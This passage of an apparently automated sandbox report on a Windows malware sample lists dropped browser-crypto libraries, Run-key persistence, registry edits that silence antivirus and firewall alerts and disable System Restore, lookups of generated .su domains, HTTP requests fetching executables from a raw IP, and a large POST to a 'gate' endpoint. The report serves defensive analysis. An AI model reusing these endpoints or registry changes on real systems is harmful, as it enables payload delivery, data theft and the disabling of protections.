  645. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-math-l1-1-0.dll",
  646. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-multibyte-l1-1-0.dll",
  647. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-private-l1-1-0.dll",
  648. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-process-l1-1-0.dll",
  649. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-runtime-l1-1-0.dll",
  650. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-stdio-l1-1-0.dll",
  651. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-string-l1-1-0.dll",
  652. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-time-l1-1-0.dll",
  653. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-utility-l1-1-0.dll",
  654. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\breakpadinjector.dll",
  655. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\freebl3.dll",
  656. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\IA2Marshal.dll",
  657. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\ldap60.dll",
  658. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\ldif60.dll",
  659. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\lgpllibs.dll",
  660. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\libEGL.dll",
  661. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\MapiProxy.dll",
  662. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\MapiProxy_InUse.dll",
  663. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\mozglue.dll",
  664. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\mozMapi32.dll",
  665. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\mozMapi32_InUse.dll",
  666. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\msvcp140.dll",
  667. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\nss3.dll",
  668. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\nssckbi.dll",
  669. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\nssdbm3.dll",
  670. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\prldap60.dll",
  671. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\qipcap.dll",
  672. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\softokn3.dll",
  673. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\ucrtbase.dll",
  674. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\vcruntime140.dll",
  675. "C:\\Users\\user\\AppData\\Local\\Temp\\sqlite3.dll",
  676. "C:\\Users\\user\\AppData\\Local\\Temp\\2683410667.exe",
  677. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER9CEE.tmp",
  678. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER9CEE.tmp.appcompat.txt",
  679. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA00C.tmp",
  680. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA00C.tmp.WERInternalMetadata.xml",
  681. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA03C.tmp",
  682. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA03C.tmp.hdmp",
  683. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAB78.tmp",
  684. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAB78.tmp.mdmp",
  685. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_cd449376f6223cf7a93dfe5d65a7144586b089d_cab_03050dcc\\Report.wer.tmp"
  686. ]
  687.  
  688. [*] Modified Registry Keys: [
  689. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Windows Services",
  690. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Windows Services",
  691. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\AntiVirusOverride",
  692. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\UpdatesOverride",
  693. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\FirewallOverride",
  694. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\AntiVirusDisableNotify",
  695. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\UpdatesDisableNotify",
  696. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\AutoUpdateDisableNotify",
  697. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\FirewallDisableNotify",
  698. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore\\DisableSR",
  699. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
  700. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\VaultSvc\\Type",
  701. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
  702. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent",
  703. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent\\DefaultConsent"
  704. ]
  705.  
  706. [*] Deleted Registry Keys: []
  707.  
  708. [*] DNS Communications: [
  709. {
  710. "type": "A",
  711. "request": "aiheiufisd.su",
  712. "answers": [
  713. {
  714. "data": "",
  715. "type": "NXDOMAIN"
  716. }
  717. ]
  718. },
  719. {
  720. "type": "A",
  721. "request": "aeoghehofu.su",
  722. "answers": [
  723. {
  724. "data": "",
  725. "type": "NXDOMAIN"
  726. }
  727. ]
  728. },
  729. {
  730. "type": "A",
  731. "request": "aniaeninie.su",
  732. "answers": [
  733. {
  734. "data": "",
  735. "type": "NXDOMAIN"
  736. }
  737. ]
  738. },
  739. {
  740. "type": "A",
  741. "request": "aiaeufaehe.su",
  742. "answers": [
  743. {
  744. "data": "",
  745. "type": "NXDOMAIN"
  746. }
  747. ]
  748. },
  749. {
  750. "type": "A",
  751. "request": "aieieieros.su",
  752. "answers": [
  753. {
  754. "data": "",
  755. "type": "NXDOMAIN"
  756. }
  757. ]
  758. },
  759. {
  760. "type": "A",
  761. "request": "abaeubuegs.su",
  762. "answers": [
  763. {
  764. "data": "",
  765. "type": "NXDOMAIN"
  766. }
  767. ]
  768. },
  769. {
  770. "type": "A",
  771. "request": "aeubeufubg.su",
  772. "answers": [
  773. {
  774. "data": "",
  775. "type": "NXDOMAIN"
  776. }
  777. ]
  778. },
  779. {
  780. "type": "A",
  781. "request": "aeuaueudgs.su",
  782. "answers": [
  783. {
  784. "data": "",
  785. "type": "NXDOMAIN"
  786. }
  787. ]
  788. },
  789. {
  790. "type": "A",
  791. "request": "xiheiufisd.su",
  792. "answers": [
  793. {
  794. "data": "",
  795. "type": "NXDOMAIN"
  796. }
  797. ]
  798. },
  799. {
  800. "type": "A",
  801. "request": "xeoghehofu.su",
  802. "answers": [
  803. {
  804. "data": "",
  805. "type": "NXDOMAIN"
  806. }
  807. ]
  808. },
  809. {
  810. "type": "A",
  811. "request": "xniaeninie.su",
  812. "answers": [
  813. {
  814. "data": "",
  815. "type": "NXDOMAIN"
  816. }
  817. ]
  818. },
  819. {
  820. "type": "A",
  821. "request": "xiaeufaehe.su",
  822. "answers": [
  823. {
  824. "data": "",
  825. "type": "NXDOMAIN"
  826. }
  827. ]
  828. },
  829. {
  830. "type": "A",
  831. "request": "xieieieros.su",
  832. "answers": [
  833. {
  834. "data": "",
  835. "type": "NXDOMAIN"
  836. }
  837. ]
  838. },
  839. {
  840. "type": "A",
  841. "request": "xbaeubuegs.su",
  842. "answers": [
  843. {
  844. "data": "",
  845. "type": "NXDOMAIN"
  846. }
  847. ]
  848. },
  849. {
  850. "type": "A",
  851. "request": "teubeufubg.su",
  852. "answers": [
  853. {
  854. "data": "",
  855. "type": "NXDOMAIN"
  856. }
  857. ]
  858. },
  859. {
  860. "type": "A",
  861. "request": "teuaueudgs.su",
  862. "answers": [
  863. {
  864. "data": "",
  865. "type": "NXDOMAIN"
  866. }
  867. ]
  868. },
  869. {
  870. "type": "A",
  871. "request": "tiheiufisd.su",
  872. "answers": [
  873. {
  874. "data": "",
  875. "type": "NXDOMAIN"
  876. }
  877. ]
  878. },
  879. {
  880. "type": "A",
  881. "request": "teoghehofu.su",
  882. "answers": [
  883. {
  884. "data": "",
  885. "type": "NXDOMAIN"
  886. }
  887. ]
  888. },
  889. {
  890. "type": "A",
  891. "request": "tniaeninie.su",
  892. "answers": [
  893. {
  894. "data": "",
  895. "type": "NXDOMAIN"
  896. }
  897. ]
  898. },
  899. {
  900. "type": "A",
  901. "request": "tiaeufaehe.su",
  902. "answers": [
  903. {
  904. "data": "",
  905. "type": "NXDOMAIN"
  906. }
  907. ]
  908. },
  909. {
  910. "type": "A",
  911. "request": "tieieieros.su",
  912. "answers": [
  913. {
  914. "data": "",
  915. "type": "NXDOMAIN"
  916. }
  917. ]
  918. },
  919. {
  920. "type": "A",
  921. "request": "tbaeubuegs.su",
  922. "answers": [
  923. {
  924. "data": "",
  925. "type": "NXDOMAIN"
  926. }
  927. ]
  928. },
  929. {
  930. "type": "A",
  931. "request": "wiheiufisd.su",
  932. "answers": [
  933. {
  934. "data": "",
  935. "type": "NXDOMAIN"
  936. }
  937. ]
  938. },
  939. {
  940. "type": "A",
  941. "request": "weoghehofu.su",
  942. "answers": [
  943. {
  944. "data": "",
  945. "type": "NXDOMAIN"
  946. }
  947. ]
  948. },
  949. {
  950. "type": "A",
  951. "request": "wniaeninie.su",
  952. "answers": [
  953. {
  954. "data": "",
  955. "type": "NXDOMAIN"
  956. }
  957. ]
  958. },
  959. {
  960. "type": "A",
  961. "request": "wiaeufaehe.su",
  962. "answers": [
  963. {
  964. "data": "",
  965. "type": "NXDOMAIN"
  966. }
  967. ]
  968. },
  969. {
  970. "type": "A",
  971. "request": "wieieieros.su",
  972. "answers": [
  973. {
  974. "data": "",
  975. "type": "NXDOMAIN"
  976. }
  977. ]
  978. },
  979. {
  980. "type": "A",
  981. "request": "wbaeubuegs.su",
  982. "answers": [
  983. {
  984. "data": "",
  985. "type": "NXDOMAIN"
  986. }
  987. ]
  988. },
  989. {
  990. "type": "A",
  991. "request": "weubeufubg.su",
  992. "answers": [
  993. {
  994. "data": "",
  995. "type": "NXDOMAIN"
  996. }
  997. ]
  998. },
  999. {
  1000. "type": "A",
  1001. "request": "weuaueudgs.su",
  1002. "answers": [
  1003. {
  1004. "data": "",
  1005. "type": "NXDOMAIN"
  1006. }
  1007. ]
  1008. },
  1009. {
  1010. "type": "A",
  1011. "request": "doc-14-24-docs.googleusercontent.com",
  1012. "answers": [
  1013. {
  1014. "data": "googlehosted.l.googleusercontent.com",
  1015. "type": "CNAME"
  1016. },
  1017. {
  1018. "data": "172.217.164.225",
  1019. "type": "A"
  1020. }
  1021. ]
  1022. }
  1023. ]
  1024.  
  1025. [*] Domains: [
  1026. {
  1027. "ip": "",
  1028. "domain": "xniaeninie.su"
  1029. },
  1030. {
  1031. "ip": "",
  1032. "domain": "tniaeninie.su"
  1033. },
  1034. {
  1035. "ip": "",
  1036. "domain": "aiaeufaehe.su"
  1037. },
  1038. {
  1039. "ip": "",
  1040. "domain": "teubeufubg.su"
  1041. },
  1042. {
  1043. "ip": "",
  1044. "domain": "aeoghehofu.su"
  1045. },
  1046. {
  1047. "ip": "",
  1048. "domain": "wbaeubuegs.su"
  1049. },
  1050. {
  1051. "ip": "",
  1052. "domain": "wieieieros.su"
  1053. },
  1054. {
  1055. "ip": "",
  1056. "domain": "wiaeufaehe.su"
  1057. },
  1058. {
  1059. "ip": "172.217.165.1",
  1060. "domain": "doc-14-24-docs.googleusercontent.com"
  1061. },
  1062. {
  1063. "ip": "",
  1064. "domain": "wniaeninie.su"
  1065. },
  1066. {
  1067. "ip": "",
  1068. "domain": "tbaeubuegs.su"
  1069. },
  1070. {
  1071. "ip": "",
  1072. "domain": "tiheiufisd.su"
  1073. },
  1074. {
  1075. "ip": "",
  1076. "domain": "aiheiufisd.su"
  1077. },
  1078. {
  1079. "ip": "",
  1080. "domain": "weoghehofu.su"
  1081. },
  1082. {
  1083. "ip": "",
  1084. "domain": "aeuaueudgs.su"
  1085. },
  1086. {
  1087. "ip": "",
  1088. "domain": "teoghehofu.su"
  1089. },
  1090. {
  1091. "ip": "",
  1092. "domain": "xiaeufaehe.su"
  1093. },
  1094. {
  1095. "ip": "",
  1096. "domain": "tieieieros.su"
  1097. },
  1098. {
  1099. "ip": "",
  1100. "domain": "aniaeninie.su"
  1101. },
  1102. {
  1103. "ip": "",
  1104. "domain": "wiheiufisd.su"
  1105. },
  1106. {
  1107. "ip": "",
  1108. "domain": "xiheiufisd.su"
  1109. },
  1110. {
  1111. "ip": "",
  1112. "domain": "aieieieros.su"
  1113. },
  1114. {
  1115. "ip": "",
  1116. "domain": "xieieieros.su"
  1117. },
  1118. {
  1119. "ip": "",
  1120. "domain": "weuaueudgs.su"
  1121. },
  1122. {
  1123. "ip": "",
  1124. "domain": "tiaeufaehe.su"
  1125. },
  1126. {
  1127. "ip": "",
  1128. "domain": "abaeubuegs.su"
  1129. },
  1130. {
  1131. "ip": "",
  1132. "domain": "aeubeufubg.su"
  1133. },
  1134. {
  1135. "ip": "",
  1136. "domain": "xbaeubuegs.su"
  1137. },
  1138. {
  1139. "ip": "",
  1140. "domain": "xeoghehofu.su"
  1141. },
  1142. {
  1143. "ip": "",
  1144. "domain": "teuaueudgs.su"
  1145. },
  1146. {
  1147. "ip": "",
  1148. "domain": "weubeufubg.su"
  1149. }
  1150. ]
  1151.  
  1152. [*] Network Communication - ICMP: [
  1153. {
  1154. "src": "192.168.56.102",
  1155. "dst": "1.1.1.1",
  1156. "type": 8,
  1157. "data": "abcdefghijklmnopqrstuvwabcdefghi"
  1158. },
  1159. {
  1160. "src": "1.1.1.1",
  1161. "dst": "192.168.56.102",
  1162. "type": 0,
  1163. "data": "abcdefghijklmnopqrstuvwabcdefghi"
  1164. }
  1165. ]
  1166.  
  1167. [*] Network Communication - HTTP: [
  1168. {
  1169. "count": 1,
  1170. "body": "",
  1171. "uri": "http://193.32.161.77/tldr.php?new=1",
  1172. "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
  1173. "method": "GET",
  1174. "host": "193.32.161.77",
  1175. "version": "1.1",
  1176. "path": "/tldr.php?new=1",
  1177. "data": "GET /tldr.php?new=1 HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
  1178. "port": 80
  1179. },
  1180. {
  1181. "count": 1,
  1182. "body": "",
  1183. "uri": "http://193.32.161.77/tldr.php?on=1",
  1184. "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
  1185. "method": "GET",
  1186. "host": "193.32.161.77",
  1187. "version": "1.1",
  1188. "path": "/tldr.php?on=1",
  1189. "data": "GET /tldr.php?on=1 HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
  1190. "port": 80
  1191. },
  1192. {
  1193. "count": 2,
  1194. "body": "",
  1195. "uri": "http://193.32.161.77/1.exe",
  1196. "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
  1197. "method": "GET",
  1198. "host": "193.32.161.77",
  1199. "version": "1.1",
  1200. "path": "/1.exe",
  1201. "data": "GET /1.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
  1202. "port": 80
  1203. },
  1204. {
  1205. "count": 2,
  1206. "body": "",
  1207. "uri": "http://193.32.161.77/2.exe",
  1208. "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
  1209. "method": "GET",
  1210. "host": "193.32.161.77",
  1211. "version": "1.1",
  1212. "path": "/2.exe",
  1213. "data": "GET /2.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
  1214. "port": 80
  1215. },
  1216. {
  1217. "count": 2,
  1218. "body": "",
  1219. "uri": "http://193.32.161.77/3.exe",
  1220. "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
  1221. "method": "GET",
  1222. "host": "193.32.161.77",
  1223. "version": "1.1",
  1224. "path": "/3.exe",
  1225. "data": "GET /3.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
  1226. "port": 80
  1227. },
  1228. {
  1229. "count": 1,
  1230. "body": "",
  1231. "uri": "http://193.32.161.77/4.exe",
  1232. "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
  1233. "method": "GET",
  1234. "host": "193.32.161.77",
  1235. "version": "1.1",
  1236. "path": "/4.exe",
  1237. "data": "GET /4.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
  1238. "port": 80
  1239. },
  1240. {
  1241. "count": 1,
  1242. "body": "",
  1243. "uri": "http://193.32.161.77/5.exe",
  1244. "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
  1245. "method": "GET",
  1246. "host": "193.32.161.77",
  1247. "version": "1.1",
  1248. "path": "/5.exe",
  1249. "data": "GET /5.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
  1250. "port": 80
  1251. },
  1252. {
  1253. "count": 1,
  1254. "body": "",
  1255. "uri": "http://34.65.152.120/gate/log.php",
  1256. "user-agent": "",
  1257. "method": "POST",
  1258. "host": "34.65.152.120",
  1259. "version": "1.1",
  1260. "path": "/gate/log.php",
  1261. "data": "POST /gate/log.php HTTP/1.1\r\nCache-Control: no-cache\r\nConnection: Keep-Alive\r\nPragma: no-cache\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 151\r\nHost: 34.65.152.120\r\n\r\n",
  1262. "port": 80
  1263. },
  1264. {
  1265. "count": 1,
  1266. "body": "",
  1267. "uri": "http://34.65.152.120/gate/sqlite3.dll",
  1268. "user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)",
  1269. "method": "GET",
  1270. "host": "34.65.152.120",
  1271. "version": "1.1",
  1272. "path": "/gate/sqlite3.dll",
  1273. "data": "GET /gate/sqlite3.dll HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)\r\nHost: 34.65.152.120\r\nConnection: Keep-Alive\r\n\r\n",
  1274. "port": 80
  1275. },
  1276. {
  1277. "count": 1,
  1278. "body": "",
  1279. "uri": "http://34.65.152.120/gate/libs.zip",
  1280. "user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)",
  1281. "method": "GET",
  1282. "host": "34.65.152.120",
  1283. "version": "1.1",
  1284. "path": "/gate/libs.zip",
  1285. "data": "GET /gate/libs.zip HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)\r\nHost: 34.65.152.120\r\nConnection: Keep-Alive\r\n\r\n",
  1286. "port": 80
  1287. },
  1288. {
  1289. "count": 1,
  1290. "body": "",
  1291. "uri": "http://34.65.152.120/file_handler/file.php?hash=a0946e9787798262e287064a4c241a14dd4b012e&js=b4c2f4ef1ddb6bd1713011242356f39f3d72c032&callback=http://34.65.152.120/gate",
  1292. "user-agent": "",
  1293. "method": "POST",
  1294. "host": "34.65.152.120",
  1295. "version": "1.1",
  1296. "path": "/file_handler/file.php?hash=a0946e9787798262e287064a4c241a14dd4b012e&js=b4c2f4ef1ddb6bd1713011242356f39f3d72c032&callback=http://34.65.152.120/gate",
  1297. "data": "POST /file_handler/file.php?hash=a0946e9787798262e287064a4c241a14dd4b012e&js=b4c2f4ef1ddb6bd1713011242356f39f3d72c032&callback=http://34.65.152.120/gate HTTP/1.1\r\nCache-Control: no-cache\r\nConnection: Keep-Alive\r\nPragma: no-cache\r\nContent-Type: multipart/form-data, boundary=Jfbvjwj3489078yuyetu\r\nContent-Length: 105677\r\nHost: 34.65.152.120\r\n\r\n",
  1298. "port": 80
  1299. }
  1300. ]
  1301.  
  1302. [*] Network Communication - SMTP: []
  1303.  
  1304. [*] Network Communication - Hosts: []
  1305.  
  1306. [*] Network Communication - IRC: []
  1307.  
  1308. [*] Static Analysis: {
  1309. "pe": {
  1310. "peid_signatures": null,
  1311. "imports": [
  1312. {
  1313. "imports": [
  1314. {
  1315. "name": "DebugActiveProcess",
  1316. "address": "0x42a010"
  1317. },
  1318. {
  1319. "name": "LockFile",
  1320. "address": "0x42a014"
  1321. },
  1322. {
  1323. "name": "CloseHandle",
  1324. "address": "0x42a018"
  1325. },
  1326. {
  1327. "name": "GetHandleInformation",
  1328. "address": "0x42a01c"
  1329. },
  1330. {
  1331. "name": "GetTickCount",
  1332. "address": "0x42a020"
  1333. },
  1334. {
  1335. "name": "lstrlenA",
  1336. "address": "0x42a024"
  1337. },
  1338. {
  1339. "name": "GetModuleHandleA",
  1340. "address": "0x42a028"
  1341. },
  1342. {
  1343. "name": "CreateHardLinkW",
  1344. "address": "0x42a02c"
  1345. },
  1346. {
  1347. "name": "GetNumberFormatW",
  1348. "address": "0x42a030"
  1349. },
  1350. {
  1351. "name": "ExitProcess",
  1352. "address": "0x42a034"
  1353. },
  1354. {
  1355. "name": "CreateToolhelp32Snapshot",
  1356. "address": "0x42a038"
  1357. },
  1358. {
  1359. "name": "Module32First",
  1360. "address": "0x42a03c"
  1361. },
  1362. {
  1363. "name": "ReadFile",
  1364. "address": "0x42a040"
  1365. },
  1366. {
  1367. "name": "CreateFileW",
  1368. "address": "0x42a044"
  1369. },
  1370. {
  1371. "name": "GetStringTypeW",
  1372. "address": "0x42a048"
  1373. },
  1374. {
  1375. "name": "OutputDebugStringW",
  1376. "address": "0x42a04c"
  1377. },
  1378. {
  1379. "name": "WriteConsoleW",
  1380. "address": "0x42a050"
  1381. },
  1382. {
  1383. "name": "SetFilePointerEx",
  1384. "address": "0x42a054"
  1385. },
  1386. {
  1387. "name": "GetBinaryTypeA",
  1388. "address": "0x42a058"
  1389. },
  1390. {
  1391. "name": "VirtualProtect",
  1392. "address": "0x42a05c"
  1393. },
  1394. {
  1395. "name": "PeekConsoleInputA",
  1396. "address": "0x42a060"
  1397. },
  1398. {
  1399. "name": "LocalAlloc",
  1400. "address": "0x42a064"
  1401. },
  1402. {
  1403. "name": "SetStdHandle",
  1404. "address": "0x42a068"
  1405. },
  1406. {
  1407. "name": "HeapReAlloc",
  1408. "address": "0x42a06c"
  1409. },
  1410. {
  1411. "name": "EncodePointer",
  1412. "address": "0x42a070"
  1413. },
  1414. {
  1415. "name": "DecodePointer",
  1416. "address": "0x42a074"
  1417. },
  1418. {
  1419. "name": "RaiseException",
  1420. "address": "0x42a078"
  1421. },
  1422. {
  1423. "name": "RtlUnwind",
  1424. "address": "0x42a07c"
  1425. },
  1426. {
  1427. "name": "GetCommandLineW",
  1428. "address": "0x42a080"
  1429. },
  1430. {
  1431. "name": "IsProcessorFeaturePresent",
  1432. "address": "0x42a084"
  1433. },
  1434. {
  1435. "name": "GetLastError",
  1436. "address": "0x42a088"
  1437. },
  1438. {
  1439. "name": "HeapAlloc",
  1440. "address": "0x42a08c"
  1441. },
  1442. {
  1443. "name": "HeapFree",
  1444. "address": "0x42a090"
  1445. },
  1446. {
  1447. "name": "GetModuleHandleExW",
  1448. "address": "0x42a094"
  1449. },
  1450. {
  1451. "name": "GetProcAddress",
  1452. "address": "0x42a098"
  1453. },
  1454. {
  1455. "name": "AreFileApisANSI",
  1456. "address": "0x42a09c"
  1457. },
  1458. {
  1459. "name": "MultiByteToWideChar",
  1460. "address": "0x42a0a0"
  1461. },
  1462. {
  1463. "name": "WideCharToMultiByte",
  1464. "address": "0x42a0a4"
  1465. },
  1466. {
  1467. "name": "HeapSize",
  1468. "address": "0x42a0a8"
  1469. },
  1470. {
  1471. "name": "EnterCriticalSection",
  1472. "address": "0x42a0ac"
  1473. },
  1474. {
  1475. "name": "LeaveCriticalSection",
  1476. "address": "0x42a0b0"
  1477. },
  1478. {
  1479. "name": "FlushFileBuffers",
  1480. "address": "0x42a0b4"
  1481. },
  1482. {
  1483. "name": "WriteFile",
  1484. "address": "0x42a0b8"
  1485. },
  1486. {
  1487. "name": "GetConsoleCP",
  1488. "address": "0x42a0bc"
  1489. },
  1490. {
  1491. "name": "GetConsoleMode",
  1492. "address": "0x42a0c0"
  1493. },
  1494. {
  1495. "name": "DeleteCriticalSection",
  1496. "address": "0x42a0c4"
  1497. },
  1498. {
  1499. "name": "FatalAppExitA",
  1500. "address": "0x42a0c8"
  1501. },
  1502. {
  1503. "name": "IsDebuggerPresent",
  1504. "address": "0x42a0cc"
  1505. },
  1506. {
  1507. "name": "SetLastError",
  1508. "address": "0x42a0d0"
  1509. },
  1510. {
  1511. "name": "GetCurrentThread",
  1512. "address": "0x42a0d4"
  1513. },
  1514. {
  1515. "name": "GetCurrentThreadId",
  1516. "address": "0x42a0d8"
  1517. },
  1518. {
  1519. "name": "GetProcessHeap",
  1520. "address": "0x42a0dc"
  1521. },
  1522. {
  1523. "name": "GetStdHandle",
  1524. "address": "0x42a0e0"
  1525. },
  1526. {
  1527. "name": "GetFileType",
  1528. "address": "0x42a0e4"
  1529. },
  1530. {
  1531. "name": "GetStartupInfoW",
  1532. "address": "0x42a0e8"
  1533. },
  1534. {
  1535. "name": "GetModuleFileNameW",
  1536. "address": "0x42a0ec"
  1537. },
  1538. {
  1539. "name": "QueryPerformanceCounter",
  1540. "address": "0x42a0f0"
  1541. },
  1542. {
  1543. "name": "GetCurrentProcessId",
  1544. "address": "0x42a0f4"
  1545. },
  1546. {
  1547. "name": "GetSystemTimeAsFileTime",
  1548. "address": "0x42a0f8"
  1549. },
  1550. {
  1551. "name": "GetEnvironmentStringsW",
  1552. "address": "0x42a0fc"
  1553. },
  1554. {
  1555. "name": "FreeEnvironmentStringsW",
  1556. "address": "0x42a100"
  1557. },
  1558. {
  1559. "name": "UnhandledExceptionFilter",
  1560. "address": "0x42a104"
  1561. },
  1562. {
  1563. "name": "SetUnhandledExceptionFilter",
  1564. "address": "0x42a108"
  1565. },
  1566. {
  1567. "name": "InitializeCriticalSectionAndSpinCount",
  1568. "address": "0x42a10c"
  1569. },
  1570. {
  1571. "name": "CreateEventW",
  1572. "address": "0x42a110"
  1573. },
  1574. {
  1575. "name": "Sleep",
  1576. "address": "0x42a114"
  1577. },
  1578. {
  1579. "name": "GetCurrentProcess",
  1580. "address": "0x42a118"
  1581. },
  1582. {
  1583. "name": "TerminateProcess",
  1584. "address": "0x42a11c"
  1585. },
  1586. {
  1587. "name": "TlsAlloc",
  1588. "address": "0x42a120"
  1589. },
  1590. {
  1591. "name": "TlsGetValue",
  1592. "address": "0x42a124"
  1593. },
  1594. {
  1595. "name": "TlsSetValue",
  1596. "address": "0x42a128"
  1597. },
  1598. {
  1599. "name": "TlsFree",
  1600. "address": "0x42a12c"
  1601. },
  1602. {
